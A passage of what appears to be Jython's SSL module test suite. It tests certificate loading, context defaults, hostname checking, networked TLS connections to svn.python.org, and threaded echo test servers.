# Jython x509 will grow by 1 while openssl remains 0
# TODO investgate deeper
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 2})
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT is a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'version': 3,
'serialNumber': 0L,
'subject': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'issuer': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT'}])
# FIXME not currently collecting this aspect of the certificate
# 'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
#
# see this sample code on how we might be able to decode:
# https://svn.apache.org/repos/asf/cxf/tags/cxf-2.4.4/distribution/src/main/release/samples/sts_issue_operation/src/main/java/demo/sts/provider/cert/CRLVerifier.java
with open(SVN_PYTHON_ORG_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 3, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
# getattr(ssl, "OP_SINGLE_DH_USE", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# )
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
@unittest.skipIf(support.is_jython, "TODO")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
@unittest.skipIf(support.is_jython, "TODO")
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
# Jython added EALREADY, as in Jython connect may have already happened
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
#self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(CAFILE_CACERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(support.is_jython, "Can't use a socket as a file under Jython")
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
@unittest.skipIf(support.is_jython, "On jython preloaded TODO")
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 3)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
_have_threads = False
if _have_threads: # Jython skip threading tests for now, really don't work :(
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with closing(socket.socket()) as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
